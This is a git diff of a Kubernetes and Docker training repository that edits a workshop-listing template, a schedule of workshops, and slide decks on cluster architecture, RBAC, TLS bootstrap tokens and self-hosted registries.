Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 83 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 81 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 81 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 81 KiB

View File

@@ -10,24 +10,6 @@ TEMPLATE="""<html>
<div class="main">
<table>
<tr><td class="header" colspan="3">{{ title }}</td></tr>
<tr><td class="details" colspan="3">Note: while some workshops are delivered in French, slides are always in English.</td></tr>
<tr><td class="title" colspan="3">Free video of our latest workshop</td></tr>
<tr>
<td>Getting Started With Kubernetes and Container Orchestration</td>
<td><a class="slides" href="https://qconuk2019.container.training" /></td>
<td><a class="video" href="https://www.youtube.com/playlist?list=PLBAFXs0YjviJwCoxSUkUPhsSxDJzpZbJd" /></td>
</tr>
<tr>
<td class="details">This is a live recording of a 1-day workshop that took place at QCON London in March 2019.</td>
</tr>
<tr>
<td class="details">If you're interested, we can deliver that workshop (or longer courses) to your team or organization.</td>
</tr>
<tr>
<td class="details">Contact <a href="mailto:jerome.petazzoni@gmail.com">Jérôme Petazzoni</a> to make that happen!</a></td>
</tr>
{% if coming_soon %}
<tr><td class="title" colspan="3">Coming soon near you</td></tr>
@@ -36,10 +18,7 @@ TEMPLATE="""<html>
<tr>
<td>{{ item.title }}</td>
<td>{% if item.slides %}<a class="slides" href="{{ item.slides }}" />{% endif %}</td>
<td>{% if item.attend %}<a class="attend" href="{{ item.attend }}" />
{% else %}
<p class="details">{{ item.status }}</p>
{% endif %}</td>
<td><a class="attend" href="{{ item.attend }}" /></td>
</tr>
<tr>
<td class="details">Scheduled {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
@@ -53,10 +32,7 @@ TEMPLATE="""<html>
{% for item in past_workshops[:5] %}
<tr>
<td>{{ item.title }}</td>
<td>{% if item.slides %}<a class="slides" href="{{ item.slides }}" />
{% else %}
<p class="details">{{ item.status }}</p>
{% endif %}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
<td>{% if item.video %}<a class="video" href="{{ item.video }}" />{% endif %}</td>
</tr>
<tr>

View File

@@ -1,47 +1,3 @@
- date: 2019-11-13
country: fr
city: Marseille
event: DevopsDDay
speaker: jpetazzo
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: http://2019.devops-dday.com/Workshop.html
- date: [2019-09-24, 2019-09-25]
country: fr
city: Paris
event: ENIX SAS
speaker: jpetazzo
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
- date: 2019-06-17
country: ca
city: Montréal
event: Zenika
speaker: jpetazzo
title: Getting Started With Kubernetes
attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
- date: [2019-06-10, 2019-06-11]
city: San Jose, CA
country: us
event: Velocity
title: Kubernetes for administrators and operators
speaker: jpetazzo
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
- date: 2019-05-01
country: us
city: Cleveland, OH
event: PyCon
speaker: jpetazzo, s0ulshake
title: Getting started with Kubernetes and container orchestration
attend: https://us.pycon.org/2019/schedule/presentation/74/
slides: https://pycon2019.container.training/
video: https://www.youtube.com/watch?v=J08MrW2NC1Y
- date: 2019-04-28
country: us
city: Chicago, IL
@@ -49,46 +5,14 @@
speaker: jpetazzo
title: Getting Started With Kubernetes and Container Orchestration
attend: https://gotochgo.com/2019/workshops/148
slides: https://gotochgo2019.container.training/
- date: 2019-04-26
country: fr
city: Paris
event: ENIX SAS
speaker: jpetazzo
title: Opérer et administrer Kubernetes
attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
slides: https://kadm-2019-04.container.training/
- date: [2019-04-23, 2019-04-24]
country: fr
city: Paris
event: ENIX SAS
speaker: jpetazzo
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
slides: https://kube-2019-04.container.training/
- date: [2019-04-15, 2019-04-16]
country: fr
city: Paris
event: ENIX SAS
speaker: "jpetazzo, alexbuisine"
title: Bien démarrer avec les conteneurs (in French)
lang: fr
attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
slides: http://intro-2019-04.container.training/
- date: 2019-03-08
- date: 2019-03-07
country: uk
city: London
event: QCON
speaker: jpetazzo
title: Getting Started With Kubernetes and Container Orchestration
attend: https://qconlondon.com/london2019/workshop/getting-started-kubernetes-and-container-orchestration
slides: https://qconuk2019.container.training/
video: https://www.youtube.com/playlist?list=PLBAFXs0YjviJwCoxSUkUPhsSxDJzpZbJd
- date: [2019-01-07, 2019-01-08]
country: fr
@@ -98,17 +22,15 @@
title: Bien démarrer avec les conteneurs (in French)
lang: fr
attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
slides: https://intro-2019-01.container.training
- date: [2018-12-17, 2018-12-18]
country: fr
city: Paris
event: ENIX SAS
speaker: "jpetazzo, rdegez"
title: Déployer ses applications avec Kubernetes
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
slides: http://decembre2018.container.training
- date: 2018-11-08
city: San Francisco, CA
@@ -193,7 +115,7 @@
city: Paris
event: ENIX SAS
speaker: jpetazzo
title: Déployer ses applications avec Kubernetes
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
slides: https://septembre2018.container.training

View File

@@ -19,7 +19,7 @@ chapters:
- shared/about-slides.md
- shared/toc.md
- - containers/Docker_Overview.md
#- containers/Docker_History.md
- containers/Docker_History.md
- containers/Training_Environment.md
- containers/Installing_Docker.md
- containers/First_Containers.md
@@ -29,16 +29,13 @@ chapters:
- containers/Building_Images_Interactively.md
- containers/Building_Images_With_Dockerfiles.md
- containers/Cmd_And_Entrypoint.md
- - containers/Copying_Files_During_Build.md
- containers/Exercise_Dockerfile_Basic.md
- containers/Multi_Stage_Builds.md
- containers/Copying_Files_During_Build.md
- - containers/Multi_Stage_Builds.md
- containers/Publishing_To_Docker_Hub.md
- containers/Dockerfile_Tips.md
- containers/Exercise_Dockerfile_Advanced.md
- - containers/Naming_And_Inspecting.md
- containers/Labels.md
- containers/Getting_Inside.md
- containers/Resource_Limits.md
- - containers/Container_Networking_Basics.md
- containers/Network_Drivers.md
- containers/Container_Network_Model.md
@@ -48,16 +45,16 @@ chapters:
- containers/Windows_Containers.md
- containers/Working_With_Volumes.md
- containers/Compose_For_Dev_Stacks.md
- containers/Exercise_Composefile.md
- - containers/Docker_Machine.md
- containers/Advanced_Dockerfiles.md
- containers/Docker_Machine.md
- - containers/Advanced_Dockerfiles.md
- containers/Application_Configuration.md
- containers/Logging.md
- containers/Resource_Limits.md
- - containers/Namespaces_Cgroups.md
- containers/Copy_On_Write.md
#- containers/Containers_From_Scratch.md
- - containers/Container_Engines.md
#- containers/Ecosystem.md
- containers/Ecosystem.md
- containers/Orchestration_Overview.md
- shared/thankyou.md
- containers/links.md

View File

@@ -30,11 +30,9 @@ chapters:
- containers/Building_Images_With_Dockerfiles.md
- containers/Cmd_And_Entrypoint.md
- containers/Copying_Files_During_Build.md
- containers/Exercise_Dockerfile_Basic.md
- - containers/Multi_Stage_Builds.md
- containers/Publishing_To_Docker_Hub.md
- containers/Dockerfile_Tips.md
- containers/Exercise_Dockerfile_Advanced.md
- - containers/Naming_And_Inspecting.md
- containers/Labels.md
- containers/Getting_Inside.md
@@ -47,7 +45,6 @@ chapters:
- containers/Windows_Containers.md
- containers/Working_With_Volumes.md
- containers/Compose_For_Dev_Stacks.md
- containers/Exercise_Composefile.md
- containers/Docker_Machine.md
- - containers/Advanced_Dockerfiles.md
- containers/Application_Configuration.md

View File

@@ -1,89 +0,0 @@
# API server availability
- When we set up a node, we need the address of the API server:
- for kubelet
- for kube-proxy
- sometimes for the pod network system (like kube-router)
- How do we ensure the availability of that endpoint?
(what if the node running the API server goes down?)
---
## Option 1: external load balancer
- Set up an external load balancer
- Point kubelet (and other components) to that load balancer
- Put the node(s) running the API server behind that load balancer
- Update the load balancer if/when an API server node needs to be replaced
- On cloud infrastructures, some mechanisms provide automation for this
(e.g. on AWS, an Elastic Load Balancer + Auto Scaling Group)
- [Example in Kubernetes The Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/08-bootstrapping-kubernetes-controllers.md#the-kubernetes-frontend-load-balancer)
---
## Option 2: local load balancer
- Set up a load balancer (like NGINX, HAProxy...) on *each* node
- Configure that load balancer to send traffic to the API server node(s)
- Point kubelet (and other components) to `localhost`
- Update the load balancer configuration when API server nodes are updated
---
## Updating the local load balancer config
- Distribute the updated configuration (push)
- Or regularly check for updates (pull)
- The latter requires an external, highly available store
(it could be an object store, an HTTP server, or even DNS...)
- Updates can be facilitated by a DaemonSet
(but remember that it can't be used when installing a new node!)
---
## Option 3: DNS records
- Put all the API server nodes behind a round-robin DNS
- Point kubelet (and other components) to that name
- Update the records when needed
- Note: this option is not officially supported
(but since kubelet supports reconnection anyway, it *should* work)
---
## Option 4: ....................
- Many managed clusters expose a high-availability API endpoint
(and you don't have to worry about it)
- You can also use HA mechanisms that you're familiar with
(e.g. virtual IPs)
- Tunnels are also fine
(e.g. [k3s](https://k3s.io/) uses a tunnel to allow each node to contact the API server)

View File

@@ -1,383 +0,0 @@
# Kubernetes architecture
We can arbitrarily split Kubernetes in two parts:
- the *nodes*, a set of machines that run our containerized workloads;
- the *control plane*, a set of processes implementing the Kubernetes APIs.
Kubernetes also relies on underlying infrastructure:
- servers, network connectivity (obviously!),
- optional components like storage systems, load balancers ...
---
## Control plane location
The control plane can run:
- in containers, on the same nodes that run other application workloads
(example: Minikube; 1 node runs everything)
- on a dedicated node
(example: a cluster installed with kubeadm)
- on a dedicated set of nodes
(example: Kubernetes The Hard Way; kops)
- outside of the cluster
(example: most managed clusters like AKS, EKS, GKE)
---
class: pic
![Kubernetes architecture diagram: control plane and nodes](images/k8s-arch2.png)
---
## What runs on a node
- Our containerized workloads
- A container engine like Docker, CRI-O, containerd...
(in theory, the choice doesn't matter, as the engine is abstracted by Kubernetes)
- kubelet: an agent connecting the node to the cluster
(it connects to the API server, registers the node, receives instructions)
- kube-proxy: a component used for internal cluster communication
(note that this is *not* an overlay network or a CNI plugin!)
---
## What's in the control plane
- Everything is stored in etcd
(it's the only stateful component)
- Everyone communicates exclusively through the API server:
- we (users) interact with the cluster through the API server
- the nodes register and get their instructions through the API server
- the other control plane components also register with the API server
- API server is the only component that reads/writes from/to etcd
---
## Communication protocols: API server
- The API server exposes a REST API
(except for some calls, e.g. to attach interactively to a container)
- Almost all requests and responses are JSON following a strict format
- For performance, the requests and responses can also be done over protobuf
(see this [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md) for details)
- In practice, protobuf is used for all internal communication
(between control plane components, and with kubelet)
---
## Communication protocols: on the nodes
The kubelet agent uses a number of special-purpose protocols and interfaces, including:
- CRI (Container Runtime Interface)
- used for communication with the container engine
- abstracts the differences between container engines
- based on gRPC+protobuf
- [CNI (Container Network Interface)](https://github.com/containernetworking/cni/blob/master/SPEC.md)
- used for communication with network plugins
- network plugins are implemented as executable programs invoked by kubelet
- network plugins provide IPAM
- network plugins set up network interfaces in pods
---
class: pic
![Kubernetes architecture diagram: communication between components](images/k8s-arch4-thanks-luxas.png)
---
# The Kubernetes API
[
*The Kubernetes API server is a "dumb server" which offers storage, versioning, validation, update, and watch semantics on API resources.*
](
https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md#proposal-and-motivation
)
([Clayton Coleman](https://twitter.com/smarterclayton), Kubernetes Architect and Maintainer)
What does that mean?
---
## The Kubernetes API is declarative
- We cannot tell the API, "run a pod"
- We can tell the API, "here is the definition for pod X"
- The API server will store that definition (in etcd)
- *Controllers* will then wake up and create a pod matching the definition
---
## The core features of the Kubernetes API
- We can create, read, update, and delete objects
- We can also *watch* objects
(be notified when an object changes, or when an object of a given type is created)
- Objects are strongly typed
- Types are *validated* and *versioned*
- Storage and watch operations are provided by etcd
(note: the [k3s](https://k3s.io/) project allows us to use sqlite instead of etcd)
---
## Let's experiment a bit!
- For the exercises in this section, connect to the first node of the `test` cluster
.exercise[
- SSH to the first node of the test cluster
- Check that the cluster is operational:
```bash
kubectl get nodes
```
- All nodes should be `Ready`
]
---
## Create
- Let's create a simple object
.exercise[
- Create a namespace with the following command:
```bash
kubectl create -f- <<EOF
apiVersion: v1
kind: Namespace
metadata:
name: hello
EOF
```
]
This is equivalent to `kubectl create namespace hello`.
---
## Read
- Let's retrieve the object we just created
.exercise[
- Read back our object:
```bash
kubectl get namespace hello -o yaml
```
]
We see a lot of data that wasn't here when we created the object.
Some data was automatically added to the object (like `spec.finalizers`).
Some data is dynamic (typically, the content of `status`.)
---
## API requests and responses
- Almost every Kubernetes API payload (requests and responses) has the same format:
```yaml
apiVersion: xxx
kind: yyy
metadata:
name: zzz
(more metadata fields here)
(more fields here)
```
- The fields shown above are mandatory, except for some special cases
(e.g.: in lists of resources, the list itself doesn't have a `metadata.name`)
- We show YAML for convenience, but the API uses JSON
(with optional protobuf encoding)
---
class: extra-details
## API versions
- The `apiVersion` field corresponds to an *API group*
- It can be either `v1` (aka "core" group or "legacy group"), or `group/versions`; e.g.:
- `apps/v1`
- `rbac.authorization.k8s.io/v1`
- `extensions/v1beta1`
- It does not indicate which version of Kubernetes we're talking about
- It *indirectly* indicates the version of the `kind`
(which fields exist, their format, which ones are mandatory...)
- A single resource type (`kind`) is rarely versioned alone
(e.g.: the `batch` API group contains `jobs` and `cronjobs`)
---
## Update
- Let's update our namespace object
- There are many ways to do that, including:
- `kubectl apply` (and provide an updated YAML file)
- `kubectl edit`
- `kubectl patch`
- many helpers, like `kubectl label`, or `kubectl set`
- In each case, `kubectl` will:
- get the current definition of the object
- compute changes
- submit the changes (with `PATCH` requests)
---
## Adding a label
- For demonstration purposes, let's add a label to the namespace
- The easiest way is to use `kubectl label`
.exercise[
- In one terminal, watch namespaces:
```bash
kubectl get namespaces --show-labels -w
```
- In the other, update our namespace:
```bash
kubectl label namespaces hello color=purple
```
]
We demonstrated *update* and *watch* semantics.
---
## What's special about *watch*?
- The API server itself doesn't do anything: it's just a fancy object store
- All the actual logic in Kubernetes is implemented with *controllers*
- A *controller* watches a set of resources, and takes action when they change
- Examples:
- when a Pod object is created, it gets scheduled and started
- when a Pod belonging to a ReplicaSet terminates, it gets replaced
- when a Deployment object is updated, it can trigger a rolling update
---
# Other control plane components
- API server ✔️
- etcd ✔️
- Controller manager
- Scheduler
---
## Controller manager
- This is a collection of loops watching all kinds of objects
- That's where the actual logic of Kubernetes lives
- When we create a Deployment (e.g. with `kubectl run web --image=nginx`),
- we create a Deployment object
- the Deployment controller notices it, creates a ReplicaSet
- the ReplicaSet controller notices it, creates a Pod
---
## Scheduler
- When a pod is created, it is in `Pending` state
- The scheduler (or rather: *a scheduler*) must bind it to a node
- Kubernetes comes with an efficient scheduler with many features
- if we have special requirements, we can add another scheduler
<br/>
(example: this [demo scheduler](https://github.com/kelseyhightower/scheduler) uses the cost of nodes, stored in node annotations)
- A pod might stay in `Pending` state for a long time:
- if the cluster is full
- if the pod has special constraints that can't be met
- if the scheduler is not running (!)

View File

@@ -64,7 +64,7 @@
(`401 Unauthorized` HTTP code)
- If a request is neither rejected nor accepted by anyone, it's anonymous
- If a request is neither accepted nor accepted by anyone, it's anonymous
- the user name is `system:anonymous`
@@ -108,7 +108,7 @@ class: extra-details
--raw \
-o json \
| jq -r .users[0].user[\"client-certificate-data\"] \
| openssl base64 -d -A \
| base64 -d \
| openssl x509 -text \
| grep Subject:
```
@@ -127,7 +127,7 @@ class: extra-details
- `--raw` includes certificate information (which shows as REDACTED otherwise)
- `-o json` outputs the information in JSON format
- `| jq ...` extracts the field with the user certificate (in base64)
- `| openssl base64 -d -A` decodes the base64 format (now we have a PEM file)
- `| base64 -d` decodes the base64 format (now we have a PEM file)
- `| openssl x509 -text` parses the certificate and outputs it as plain text
- `| grep Subject:` shows us the line that interests us
@@ -143,21 +143,19 @@ class: extra-details
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
- As a result, we don't have an easy way to terminate someone's access
- As a result, we cannot easily suspend a user's access
(if their key is compromised, or they leave the organization)
- There are workarounds, but they are very inconvenient:
- Option 1: re-create a new CA and re-issue everyone's certificates
<br/>
→ Maybe OK if we only have a few users; no way otherwise
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
- Option 2: don't use groups; grant permissions to individual users
<br/>
→ Inconvenient if we have many users and teams; error-prone
- re-create the CA and re-issue all certificates in case of compromise
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
<br/>
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
- grant permissions to individual users, not groups
<br/>
(and remove all permissions to a compromised user)
- Until this is fixed, we probably want to use other methods
---
@@ -262,7 +260,7 @@ class: extra-details
- Extract the token and decode it:
```bash
TOKEN=$(kubectl get secret $SECRET -o json \
| jq -r .data.token | openssl base64 -d -A)
| jq -r .data.token | base64 -d)
```
]
@@ -409,7 +407,7 @@ class: extra-details
- We are going to create a service account
- We will use a default cluster role (`view`)
- We will use an existing cluster role (`view`)
- We will bind together this role and this service account
@@ -576,51 +574,6 @@ It's important to note a couple of details in these flags ...
class: extra-details
## Where does this `view` role come from?
- Kubernetes defines a number of ClusterRoles intended to be bound to users
- `cluster-admin` can do *everything* (think `root` on UNIX)
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
- `edit` is similar to `admin`, but cannot view or edit permissions
- `view` has read-only access to most resources, except permissions and secrets
*In many situations, these roles will be all you need.*
*You can also customize them if needed!*
---
class: extra-details
## Customizing the default roles
- If you need to *add* permissions to these default roles (or others),
<br/>
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
- This happens by creating a ClusterRole with the following labels:
```yaml
metadata:
labels:
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-view: "true"
```
- This ClusterRole permissions will be added to `admin`/`edit`/`view` respectively
- This is particulary useful when using CustomResourceDefinitions
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
---
class: extra-details
## Where do our permissions come from?
- When interacting with the Kubernetes API, we are using a client certificate
@@ -658,26 +611,3 @@ class: extra-details
```bash
kubectl describe clusterrole cluster-admin
```
---
class: extra-details
## Figuring out who can do what
- For auditing purposes, sometimes we want to know who can perform an action
- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
https://github.com/aquasecurity/kubectl-who-can
- This is one way to install it:
```bash
docker run --rm -v /usr/local/bin:/go/bin golang \
go get -v github.com/aquasecurity/kubectl-who-can
```
- This is one way to use it:
```bash
kubectl-who-can create pods
```

View File

@@ -1,259 +0,0 @@
# TLS bootstrap
- kubelet needs TLS keys and certificates to communicate with the control plane
- How do we generate this information?
- How do we make it available to kubelet?
---
## Option 1: push
- When we want to provision a node:
- generate its keys, certificate, and sign centrally
- push the files to the node
- OK for "traditional", on-premises deployments
- Not OK for cloud deployments with auto-scaling
---
## Option 2: poll + push
- Discover nodes when they are created
(e.g. with cloud API)
- When we detect a new node, push TLS material to the node
(like in option 1)
- It works, but:
- discovery code is specific to each provider
- relies heavily on the cloud provider API
- doesn't work on-premises
- doesn't scale
---
## Option 3: bootstrap tokens + CSR API
- Since Kubernetes 1.4, the Kubernetes API supports CSR
(Certificate Signing Requests)
- This is similar to the protocol used to obtain e.g. HTTPS certificates:
- subject (here, kubelet) generates TLS keys and CSR
- subject submits CSR to CA
- CA validates (or not) the CSR
- CA sends back signed certificate to subject
- This is combined with *bootstrap tokens*
---
## Bootstrap tokens
- A [bootstrap token](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) is an API access token
- it is a Secret with type `bootstrap.kubernetes.io/token`
- it is 6 public characters (ID) + 16 secret characters
<br/>(example: `whd3pq.d1ushuf6ccisjacu`)
- it gives access to groups `system:bootstrap:<ID>` and `system:bootstrappers`
- additional groups can be specified in the Secret
---
## Bootstrap tokens with kubeadm
- kubeadm automatically creates a bootstrap token
(it is shown at the end of `kubeadm init`)
- That token adds the group `system:bootstrappers:kubeadm:default-node-token`
- kubeadm also creates a ClusterRoleBinding `kubeadm:kubelet-bootstrap`
<br/>binding `...:default-node-token` to ClusterRole `system:node-bootstrapper`
- That ClusterRole gives create/get/list/watch permissions on the CSR API
---
## Bootstrap tokens in practice
- Let's list our bootstrap tokens on a cluster created with kubeadm
.exercise[
- Log into node `test1`
- View bootstrap tokens:
```bash
sudo kubeadm token list
```
]
- Tokens are short-lived
- We can create new tokens with `kubeadm` if necessary
---
class: extra-details
## Retrieving bootstrap tokens with kubectl
- Bootstrap tokens are Secrets with type `bootstrap.kubernetes.io/token`
- Token ID and secret are in data fields `token-id` and `token-secret`
- In Secrets, data fields are encoded with Base64
- This "very simple" command will show us the tokens:
```
kubectl -n kube-system get secrets -o json |
jq -r '.items[]
| select(.type=="bootstrap.kubernetes.io/token")
| ( .data["token-id"] + "Lg==" + .data["token-secret"] + "Cg==")
' | base64 -d
```
(On recent versions of `jq`, you can simplify by using filter `@base64d`.)
---
class: extra-details
## Using a bootstrap token
- The token we need to use has the form `abcdef.1234567890abcdef`
.exercise[
- Check that it is accepted by the API server:
```bash
curl -k -H "Authorization: Bearer abcdef.1234567890abcdef"
```
- We should see that we are *authenticated* but not *authorized*:
```
User \"system:bootstrap:abcdef\" cannot get path \"/\""
```
- Check that we can access the CSR API:
```bash
curl -k -H "Authorization: Bearer abcdef.1234567890abcdef" \
https://10.96.0.1/apis/certificates.k8s.io/v1beta1/certificatesigningrequests
```
]
---
## The cluster-info ConfigMap
- Before we can talk to the API, we need:
- the API server address (obviously!)
- the cluster CA certificate
- That information is stored in a public ConfigMap
.exercise[
- Retrieve that ConfigMap:
```bash
curl -k https://10.96.0.1/api/v1/namespaces/kube-public/configmaps/cluster-info
```
]
*Extracting the kubeconfig file is left as an exercise for the reader.*
---
class: extra-details
## Signature of the config-map
- You might have noticed a few `jws-kubeconfig-...` fields
- These are config-map signatures
(so that the client can protect against MITM attacks)
- These are JWS signatures using HMAC-SHA256
(see [here](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/#configmap-signing) for more details)
---
## Putting it all together
This is the TLS bootstrap mechanism, step by step.
- The node uses the cluster-info ConfigMap to get the cluster CA certificate
- The node generates its keys and CSR
- Using the bootstrap token, the node creates a CertificateSigningRequest object
- The node watches the CSR object
- The CSR object is accepted (automatically or by an admin)
- The node gets notified, and retrieves the certificate
- The node can now join the cluster
---
## Bottom line
- If you paid attention, we still need a way to:
- either safely get the bootstrap token to the nodes
- or disable auto-approval and manually approve the nodes when they join
- The goal of the TLS bootstrap mechanism is *not* to solve this
(in terms of information knowledge, it's fundamentally impossible!)
- But it reduces the differences between environments, infrastructures, providers ...
- It gives a mechanism that is easier to use, and flexible enough, for most scenarios
---
## More information
- As always, the Kubernetes documentation has extra details:
- [TLS management](https://kubernetes.io/docs/tasks/tls/managing-tls-in-a-cluster/)
- [Authenticating with bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/)
- [TLS bootstrapping](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/)
- [kubeadm token](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-token/) command
- [kubeadm join](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/) command (has details about [the join workflow](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/#join-workflow))

View File

@@ -1,40 +0,0 @@
## Using images from the Docker Hub
- For everyone's convenience, we took care of building DockerCoins images
- We pushed these images to the DockerHub, under the [dockercoins](https://hub.docker.com/u/dockercoins) user
- These images are *tagged* with a version number, `v0.1`
- The full image names are therefore:
- `dockercoins/hasher:v0.1`
- `dockercoins/rng:v0.1`
- `dockercoins/webui:v0.1`
- `dockercoins/worker:v0.1`
---
## Setting `$REGISTRY` and `$TAG`
- In the upcoming exercises and labs, we use a couple of environment variables:
- `$REGISTRY` as a prefix to all image names
- `$TAG` as the image version tag
- For example, the worker image is `$REGISTRY/worker:$TAG`
- If you copy-paste the commands in these exercises:
**make sure that you set `$REGISTRY` and `$TAG` first!**
- For example:
```
export REGISTRY=dockercoins TAG=v0.1
```
(this will expand `$REGISTRY/worker:$TAG` to `dockercoins/worker:v0.1`)

View File

@@ -1,235 +0,0 @@
## Self-hosting our registry
*Note: this section shows how to run the Docker
open source registry and use it to ship images
on our cluster. While this method works fine,
we recommend that you consider using one of the
hosted, free automated build services instead.
It will be much easier!*
*If you need to run a registry on premises,
this section gives you a starting point, but
you will need to make a lot of changes so that
the registry is secured, highly available, and
so that your build pipeline is automated.*
---
## Using the open source registry
- We need to run a `registry` container
- It will store images and layers to the local filesystem
<br/>(but you can add a config file to use S3, Swift, etc.)
- Docker *requires* TLS when communicating with the registry
- unless for registries on `127.0.0.0/8` (i.e. `localhost`)
- or with the Engine flag `--insecure-registry`
- Our strategy: publish the registry container on a NodePort,
<br/>so that it's available through `127.0.0.1:xxxxx` on each node
---
## Deploying a self-hosted registry
- We will deploy a registry container, and expose it with a NodePort
.exercise[
- Create the registry service:
```bash
kubectl create deployment registry --image=registry
```
- Expose it on a NodePort:
```bash
kubectl expose deploy/registry --port=5000 --type=NodePort
```
]
---
## Connecting to our registry
- We need to find out which port has been allocated
.exercise[
- View the service details:
```bash
kubectl describe svc/registry
```
- Get the port number programmatically:
```bash
NODEPORT=$(kubectl get svc/registry -o json | jq .spec.ports[0].nodePort)
REGISTRY=127.0.0.1:$NODEPORT
```
]
---
## Testing our registry
- A convenient Docker registry API route to remember is `/v2/_catalog`
.exercise[
<!-- ```hide kubectl wait deploy/registry --for condition=available```-->
- View the repositories currently held in our registry:
```bash
curl $REGISTRY/v2/_catalog
```
]
--
We should see:
```json
{"repositories":[]}
```
---
## Testing our local registry
- We can retag a small image, and push it to the registry
.exercise[
- Make sure we have the busybox image, and retag it:
```bash
docker pull busybox
docker tag busybox $REGISTRY/busybox
```
- Push it:
```bash
docker push $REGISTRY/busybox
```
]
---
## Checking again what's on our local registry
- Let's use the same endpoint as before
.exercise[
- Ensure that our busybox image is now in the local registry:
```bash
curl $REGISTRY/v2/_catalog
```
]
The curl command should now output:
```json
{"repositories":["busybox"]}
```
---
## Building and pushing our images
- We are going to use a convenient feature of Docker Compose
.exercise[
- Go to the `stacks` directory:
```bash
cd ~/container.training/stacks
```
- Build and push the images:
```bash
export REGISTRY
export TAG=v0.1
docker-compose -f dockercoins.yml build
docker-compose -f dockercoins.yml push
```
]
Let's have a look at the `dockercoins.yml` file while this is building and pushing.
---
```yaml
version: "3"
services:
rng:
build: dockercoins/rng
image: ${REGISTRY-127.0.0.1:5000}/rng:${TAG-latest}
deploy:
mode: global
...
redis:
image: redis
...
worker:
build: dockercoins/worker
image: ${REGISTRY-127.0.0.1:5000}/worker:${TAG-latest}
...
deploy:
replicas: 10
```
.warning[Just in case you were wondering ... Docker "services" are not Kubernetes "services".]
---
class: extra-details
## Avoiding the `latest` tag
.warning[Make sure that you've set the `TAG` variable properly!]
- If you don't, the tag will default to `latest`
- The problem with `latest`: nobody knows what it points to!
- the latest commit in the repo?
- the latest commit in some branch? (Which one?)
- the latest tag?
- some random version pushed by a random team member?
- If you keep pushing the `latest` tag, how do you roll back?
- Image tags should be meaningful, i.e. correspond to code branches, tags, or hashes
---
## Checking the content of the registry
- All our images should now be in the registry
.exercise[
- Re-run the same `curl` command as earlier:
```bash
curl $REGISTRY/v2/_catalog
```
]
*In these slides, all the commands to deploy
DockerCoins will use a $REGISTRY environment
variable, so that we can quickly switch from
the self-hosted registry to pre-built images
hosted on the Docker Hub. So make sure that
this $REGISTRY variable is set correctly when
running the exercises!*

View File

@@ -1,144 +0,0 @@
# The Cloud Controller Manager
- Kubernetes has many features that are cloud-specific
(e.g. providing cloud load balancers when a Service of type LoadBalancer is created)
- These features were initially implemented in API server and controller manager
- Since Kubernetes 1.6, these features are available through a separate process:
the *Cloud Controller Manager*
- The CCM is optional, but if we run in a cloud, we probably want it!
---
## Cloud Controller Manager duties
- Creating and updating cloud load balancers
- Configuring routing tables in the cloud network (specific to GCE)
- Updating node labels to indicate region, zone, instance type ...
- Obtain node name, internal and external addresses from cloud metadata service
- Deleting nodes from Kubernetes when they're deleted in the cloud
- Managing *some* volumes (e.g. ELBs, AzureDisks ...)
(Eventually, volumes will be managed by the CSI)
---
## In-tree vs. out-of-tree
- A number of cloud providers are supported "in-tree"
(in the main kubernetes/kubernetes repository on GitHub)
- More cloud providers are supported "out-of-tree"
(with code in different repositories)
